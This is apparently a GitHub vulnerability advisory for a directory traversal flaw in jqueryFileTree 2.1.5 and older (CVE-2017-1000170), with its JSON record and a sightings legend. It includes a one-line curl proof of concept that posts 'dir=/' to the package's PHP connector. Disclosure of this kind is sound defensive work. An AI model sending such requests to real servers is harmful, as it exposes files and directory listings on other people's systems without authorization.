ghsa-p739-9479-5wr2
Vulnerability from github
Published
2022-05-13 01:11
Modified
2024-04-22 23:09
Severity ?
VLAI Severity ?
Summary
jqueryFileTree vulnerable to Directory Traversal
Details
jqueryFileTree 2.1.5 and older is vulnerable to Directory Traversal
POC:
bash
curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "jqueryfiletree"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.1.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-1000170"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-22T23:09:03Z",
"nvd_published_at": "2017-11-17T18:29:00Z",
"severity": "HIGH"
},
"details": "jqueryFileTree 2.1.5 and older is vulnerable to Directory Traversal\n\n### POC:\n```bash\ncurl \u0027http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php\u0027 -H \u0027Referer: xxx\u0027 -d \"dir=/\"\n```",
"id": "GHSA-p739-9479-5wr2",
"modified": "2024-04-22T23:09:03Z",
"published": "2022-05-13T01:11:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000170"
},
{
"type": "WEB",
"url": "https://github.com/jqueryfiletree/jqueryfiletree/issues/66"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "jqueryFileTree vulnerable to Directory Traversal"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…